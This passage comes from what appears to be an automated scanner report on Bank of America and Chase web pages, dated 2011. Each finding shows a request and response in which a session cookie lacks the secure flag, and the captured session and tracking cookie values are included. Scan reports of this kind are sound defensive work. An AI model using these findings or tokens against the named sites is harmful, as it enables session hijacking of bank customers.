Set-Cookie: JSESSIONID=00003PfGoFif26Fdykwp9gAzvj_:15bvh4s8c; Path=/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Via: On-Demand Router/1.0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US


       

6.36. https://www.bankofamerica.com/homepage/overview.go  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.bankofamerica.com
Path:   /homepage/overview.go

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /homepage/overview.go HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; BIGipServerngen-www.80=1011267243.20480.0000; TCID=0007ae71-9ad3-3b5c-9719-884700000028; LANG_COOKIE=en_US; CFTOKEN=1adcf2e%2D000b94b1%2Dd50b%2D1d49%2D818d%2Dffffffff4552; CMAVID=none; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; cmTPSet=Y; CFID=130174869; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; TLTSID=D98FA69C2F17102F856AA91CC30F81BB; throttle_value=21;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:36:54 GMT
Server: IBM_HTTP_Server
Cache-Control: no-cache
Set-Cookie: JSESSIONID=0000rkA76miCyoAH_YXJjPhdBRX:157dm9mod; Path=/
Set-Cookie: CONTEXT=en_US; Path=/; Domain=.bankofamerica.com
Set-Cookie: INTL_LANG=en_US; Path=/; Domain=.bankofamerica.com
Set-Cookie: LANG_COOKIE=en_US; Path=/; Domain=.bankofamerica.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Via: On-Demand Router/1.0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 48227


       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">

...[SNIP]...

6.37. https://www.bankofamerica.com/homepage/stateSelect.go  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.bankofamerica.com
Path:   /homepage/stateSelect.go

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /homepage/stateSelect.go HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; BIGipServerngen-www.80=1011267243.20480.0000; TCID=0007ae71-9ad3-3b5c-9719-884700000028; LANG_COOKIE=en_US; CFTOKEN=1adcf2e%2D000b94b1%2Dd50b%2D1d49%2D818d%2Dffffffff4552; CMAVID=none; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; cmTPSet=Y; CFID=130174869; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; TLTSID=D98FA69C2F17102F856AA91CC30F81BB; throttle_value=21;

Response

HTTP/1.1 302 Found
Date: Wed, 02 Feb 2011 22:37:01 GMT
Server: IBM_HTTP_Server
Location: https://www.bankofamerica.com/content/documents/homepage/fail-over-state.htm
Content-Length: 0
Set-Cookie: JSESSIONID=0000KfKQ5uJUidkgqvdCEWeKhAN:157dm9kih; Path=/
Set-Cookie: state=""; Expires=Mon, 01 Aug 2011 22:36:32 GMT; Path=/; Domain=.bankofamerica.com
Set-Cookie: CONTEXT=en_US; Path=/; Domain=.bankofamerica.com
Set-Cookie: INTL_LANG=en_US; Path=/; Domain=.bankofamerica.com
Set-Cookie: LANG_COOKIE=en_US; Path=/; Domain=.bankofamerica.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
Via: On-Demand Router/1.0
Connection: close
Content-Type: text/plain
Content-Language: en-US


6.38. https://www.bankofamerica.com/hub/index.action  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.bankofamerica.com
Path:   /hub/index.action

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /hub/index.action HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;

Response

HTTP/1.1 302 Found
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 02 Feb 2011 22:04:54 GMT
Content-length: 0
Content-type: text/html
Location: https://www.bankofamerica.com/
Content-language: en-US
Set-cookie: JSESSIONID=00008fBXnMpsDuQjSc8kH5YogBG:12qb4k2ev; Path=/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-control: no-cache="set-cookie, set-cookie2"
Connection: close


6.39. https://www.bankofamerica.com/myexpression_banking/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.bankofamerica.com
Path:   /myexpression_banking/

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /myexpression_banking/ HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; BIGipServerngen-www.80=1011267243.20480.0000; TCID=0007ae71-9ad3-3b5c-9719-884700000028; LANG_COOKIE=en_US; CFTOKEN=1adcf2e%2D000b94b1%2Dd50b%2D1d49%2D818d%2Dffffffff4552; CMAVID=none; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; cmTPSet=Y; CFID=130174869; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; TLTSID=D98FA69C2F17102F856AA91CC30F81BB; throttle_value=21;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 02 Feb 2011 22:37:19 GMT
Content-type: text/html;charset=ISO-8859-1
Set-Cookie: TLTSID=D98FA69C2F17102F856AA91CC30F81BB; Path=/; Domain=.bankofamerica.com
Set-Cookie: TLTUID=D98FA69C2F17102F856AA91CC30F81BB; Path=/; Domain=.bankofamerica.com; Expires=Wed, 02-02-2021 22:37:18 GMT
Content-language: en-US
Set-cookie: JSESSIONID=0000qBCC58S04lOiUm6Gm3P4sLQ:12rfueg3b; Path=/
Set-cookie: INTL_LANG=en_US
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-control: no-cache="set-cookie, set-cookie2"
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
   <head>
       <meta http-equiv="content-type" content="text/html; charset=iso-8859-1">
       <meta name="Description"
...[SNIP]...

6.40. https://www.bankofamerica.com/planning/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.bankofamerica.com
Path:   /planning/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /planning/ HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; BIGipServerngen-www.80=1011267243.20480.0000; TCID=0007ae71-9ad3-3b5c-9719-884700000028; LANG_COOKIE=en_US; CFTOKEN=1adcf2e%2D000b94b1%2Dd50b%2D1d49%2D818d%2Dffffffff4552; CMAVID=none; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; cmTPSet=Y; CFID=130174869; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; TLTSID=D98FA69C2F17102F856AA91CC30F81BB; throttle_value=21;

Response

HTTP/1.1 302 Found
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 02 Feb 2011 22:36:25 GMT
Content-length: 0
Content-type: text/html
Location: https://www5.bankofamerica.com/planning/investments.action
Content-language: en-US
Set-cookie: JSESSIONID=0000MZoA15Z0qVQ4mcJR1wynojo:12qtmh33l; Path=/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-control: no-cache="set-cookie, set-cookie2"
Connection: close


6.41. https://www.bankofamerica.com/planning/investments.action  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.bankofamerica.com
Path:   /planning/investments.action

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /planning/investments.action HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 02 Feb 2011 22:04:32 GMT
Content-type: text/html
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-control: no-cache, post-check=0, pre-check=0
Content-language: en-US
Set-cookie: JSESSIONID=0000-_A2xQfu_W2uW6lF2fly4Fp:12qb4k2ev; Path=/
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset
...[SNIP]...

6.42. https://www.bankofamerica.com/privacy/Control.do  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.bankofamerica.com
Path:   /privacy/Control.do

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /privacy/Control.do HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 02 Feb 2011 22:05:07 GMT
Content-type: text/html;charset=ISO-8859-1
Content-language: en-US
Set-cookie: JSESSIONID=0000mMBXhgo6t8S8rSEKqaClP3F:12qb4k2ev; Path=/
Set-cookie: INTL_LANG=en_US
Set-cookie: BOA_COM_BT_ELIGIBLE=No; Expires=Wed, 09 Feb 2011 22:05:06 GMT; Domain=.bankofamerica.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-control: no-cache="set-cookie, set-cookie2"
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
   <head>
       <meta http-equiv="content-type" content="text/html; charset=iso-8859-1">
       <meta name="Descri
...[SNIP]...

6.43. https://www.bankofamerica.com/privacy/index.jsp  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.bankofamerica.com
Path:   /privacy/index.jsp

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /privacy/index.jsp HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 02 Feb 2011 22:05:05 GMT
Content-type: text/html;charset=ISO-8859-1
Content-language: en-US
Set-cookie: JSESSIONID=0000lQoVpN6o_Syjb5ohyReSXTa:12qb4k2ev; Path=/
Set-cookie: INTL_LANG=en_US
Set-cookie: BOA_COM_BT_ELIGIBLE=No; Expires=Wed, 09 Feb 2011 22:05:04 GMT; Domain=.bankofamerica.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-control: no-cache="set-cookie, set-cookie2"
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
   <head>
       <meta http-equiv="content-type" content="text/html; charset=iso-8859-1">
       <meta name="Descri
...[SNIP]...

6.44. https://www.bankofamerica.com/retirementcenter/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.bankofamerica.com
Path:   /retirementcenter/

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /retirementcenter/ HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 02 Feb 2011 22:05:04 GMT
Content-length: 6708
Content-type: text/html;charset=ISO-8859-1
Set-Cookie: TLTSID=D98FA69C2F17102F856AA91CC30F81BB; Path=/; Domain=.bankofamerica.com
Set-Cookie: TLTUID=D98FA69C2F17102F856AA91CC30F81BB; Path=/; Domain=.bankofamerica.com; Expires=Wed, 02-02-2021 22:05:04 GMT
Content-language: en-US
Set-cookie: JSESSIONID=00000dst3On8WtECYEVTJX5Czjw:12qb4kb6q; Path=/
Set-cookie: INTL_LANG=en_US
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-control: no-cache="set-cookie, set-cookie2"
Connection: close


       <title>Bank of America | Please Select Your State</title>
       <link rel="stylesheet" href="/www/global/mvc_objects/stylesheet/mvc_content_style.css" type="text/css">
       <link rel="stylesheet" href
...[SNIP]...

6.45. https://www.bankofamerica.com/search/Search.do  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.bankofamerica.com
Path:   /search/Search.do

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /search/Search.do HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;

Response

HTTP/1.1 302 Found
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 02 Feb 2011 22:05:13 GMT
Content-length: 0
Location: https://www6.bankofamerica.com/search/Search.do
Content-language: en-US
Set-cookie: JSESSIONID=0000d7-ksy874kdblG0_pEKtKn2:13ihk3qeh; Path=/
Set-cookie: INTL_LANG=en_US
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-control: no-cache="set-cookie, set-cookie2"
Connection: close


6.46. https://www.bankofamerica.com/sitemap/index.action  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.bankofamerica.com
Path:   /sitemap/index.action

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sitemap/index.action HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;

Response

HTTP/1.1 302 Found
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 02 Feb 2011 22:05:13 GMT
Content-length: 0
Content-type: text/html
Location: https://www.bankofamerica.com/global/stateselection.action?returnUrl=https://www.bankofamerica.com/sitemap/index.jsp
Content-language: en-US
Set-cookie: JSESSIONID=0000AHYKHX5RDNXbJ74F_kN_fGy:12qb4k2ev; Path=/
Set-cookie: BOA_COM_BT_ELIGIBLE=No; Expires=Wed, 09 Feb 2011 22:05:13 GMT; Domain=.bankofamerica.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-control: no-cache="set-cookie, set-cookie2"
Connection: close


6.47. https://www.bankofamerica.com/smallbusiness/index.jsp  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.bankofamerica.com
Path:   /smallbusiness/index.jsp

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /smallbusiness/index.jsp HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 02 Feb 2011 22:04:29 GMT
Content-type: text/html;charset=ISO-8859-1
Content-language: en-US
Set-cookie: JSESSIONID=00001dmfVt102GWARUceA1dBtn0:12qb4k7c1; Path=/
Set-cookie: INTL_LANG=en_US
Set-cookie: BOA_COM_BT_ELIGIBLE=No; Expires=Wed, 09 Feb 2011 22:04:28 GMT; Domain=.bankofamerica.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-control: no-cache="set-cookie, set-cookie2"
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en_US">
   <head>
       <meta http-equiv="content-type" content="text/html; charset=iso-8859-1">
       <meta name="Descript
...[SNIP]...

6.48. https://www.chase.com/MilitaryLendingProgram  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.chase.com
Path:   /MilitaryLendingProgram

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /MilitaryLendingProgram HTTP/1.1
Host: www.chase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mvt_experience=OUT_MVT; v1st=60B8BEB245ABF79;

Response

HTTP/1.1 301 Moved Permanently
Server: JPMC1.0
Date: Thu, 03 Feb 2011 01:06:32 GMT
Content-type: text/html
CP: "NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Location: https://www.chase.com/ccpmweb/chf/document/militarylendingrogram.html
Set-Cookie: DCTMSESSION=pWqKNJ1Yv9NlgJ9kghvXKyZLpQVVXTgYyKD5x51HXqvvslJM3G4x!-661114096; path=/
Connection: close

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="https://www.chase.com/ccpmweb/chf/
...[SNIP]...

6.49. https://www.chase.com/ccp/index.jsp  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.chase.com
Path:   /ccp/index.jsp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ccp/index.jsp HTTP/1.1
Host: www.chase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mvt_experience=OUT_MVT; v1st=60B8BEB245ABF79;

Response

HTTP/1.1 301 Moved Permanently
Server: JPMC1.0
Date: Wed, 02 Feb 2011 22:16:36 GMT
Content-type: text/html;charset=UTF-8
CP: "NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Location: https://www.chase.com/
Set-Cookie: DCTMSESSION=JWTFNJXGmZr1X2nwQZHwnnLjtkzTGpQJ5DHvfJ94f6GFQqG4Qgyv!1262409899; path=/
Connection: close

<!--Generated by WebLogic Workshop-->


<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFF
...[SNIP]...

6.50. https://www.chase.com/chf/mortgage/om_chasecom_redirect  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.chase.com
Path:   /chf/mortgage/om_chasecom_redirect

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /chf/mortgage/om_chasecom_redirect HTTP/1.1
Host: www.chase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mvt_experience=OUT_MVT; v1st=60B8BEB245ABF79;

Response

HTTP/1.1 200 OK
Server: JPMC1.0
Date: Wed, 02 Feb 2011 22:16:35 GMT
Content-length: 959
Content-type: text/html;charset=UTF-8
CP: "NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Set-Cookie: DCTMSESSION=ShdXNJXDQb0ZFHj1qGKczSFvgTsznLZk7Y4h2czW2Hy7tvLD7KtZ!1262409899; path=/
Connection: close

<html LANG="EN" >
<head>
<META NAME="robots" CONTENT="index,follow"/>
<title >Chase</title>
</head>
<body><script language="JavaScript">
var s_pageName="Homeownership Center - Obama March 4th - chase
...[SNIP]...

6.51. https://www.chase.com/framework/skeletons/psmgenskel  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.chase.com
Path:   /framework/skeletons/psmgenskel

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /framework/skeletons/psmgenskel HTTP/1.1
Host: www.chase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mvt_experience=OUT_MVT; v1st=60B8BEB245ABF79;

Response

HTTP/1.1 301 Moved Permanently
Server: JPMC1.0
Date: Wed, 02 Feb 2011 22:16:36 GMT
Content-type: text/html;charset=UTF-8
CP: "NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Location: https://www.chase.com/cm/shared/crb/page/notfound.html
Set-Cookie: DCTMSESSION=TGFhNJXG71xk8S9N20Cn9bvPGH9yrm34fvpzv4HJ4vS1Qd9YSb6M!1262409899; path=/
Connection: close

<!--Generated by WebLogic Workshop-->


<html><head><title>302 Moved Temporarily</title></head>
<body
...[SNIP]...

6.52. https://www.chase.com/framework/skins/psmgenskin  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.chase.com
Path:   /framework/skins/psmgenskin

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /framework/skins/psmgenskin HTTP/1.1
Host: www.chase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mvt_experience=OUT_MVT; v1st=60B8BEB245ABF79;

Response

HTTP/1.1 301 Moved Permanently
Server: JPMC1.0
Date: Wed, 02 Feb 2011 22:16:37 GMT
Content-type: text/html;charset=UTF-8
CP: "NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Location: https://www.chase.com/cm/shared/crb/page/notfound.html
Set-Cookie: DCTMSESSION=m6CMNJXFZC8PjQQGMf6sxvPhwgmTfjK0RYFv4QFJyyLQsBjXGn1m!2074473016; path=/
Connection: close

<!--Generated by WebLogic Workshop-->


<html><head><title>302 Moved Temporarily</title></head>
<body
...[SNIP]...

6.53. https://www.chase.com/framework/skins/psmgenskin/images  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.chase.com
Path:   /framework/skins/psmgenskin/images

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /framework/skins/psmgenskin/images HTTP/1.1
Host: www.chase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mvt_experience=OUT_MVT; v1st=60B8BEB245ABF79;

Response

HTTP/1.1 301 Moved Permanently
Server: JPMC1.0
Date: Wed, 02 Feb 2011 22:16:37 GMT
Content-type: text/html;charset=UTF-8
CP: "NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Location: https://www.chase.com/cm/shared/crb/page/notfound.html
Set-Cookie: DCTMSESSION=6g6NNJXFxLM7k3X2S2lR1bkgB1YqhbvphnpHhSMxkgVP6SXmGTFQ!1262409899; path=/
Connection: close

<!--Generated by WebLogic Workshop-->


<html><head><title>302 Moved Temporarily</title></head>
<body
...[SNIP]...

6.54. https://www.chase.com/index.jsp  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.chase.com
Path:   /index.jsp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /index.jsp HTTP/1.1
Host: www.chase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mvt_experience=OUT_MVT; v1st=60B8BEB245ABF79;

Response

HTTP/1.1 301 Moved Permanently
Server: JPMC1.0
Date: Wed, 02 Feb 2011 22:16:34 GMT
Content-type: text/html;charset=UTF-8
CP: "NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Location: https://www.chase.com/
Set-Cookie: DCTMSESSION=jfkfNJXCyH5XHZVYYRdMBh3DlcZvv0J0RGw0MtqzPlxX9TQR6Xvp!2074473016; path=/
Connection: close

<!--Generated by WebLogic Workshop-->


<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFF
...[SNIP]...

6.55. https://www.chase.com/online/logon/on_successful_logon.jsp  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.chase.com
Path:   /online/logon/on_successful_logon.jsp

Issue detail

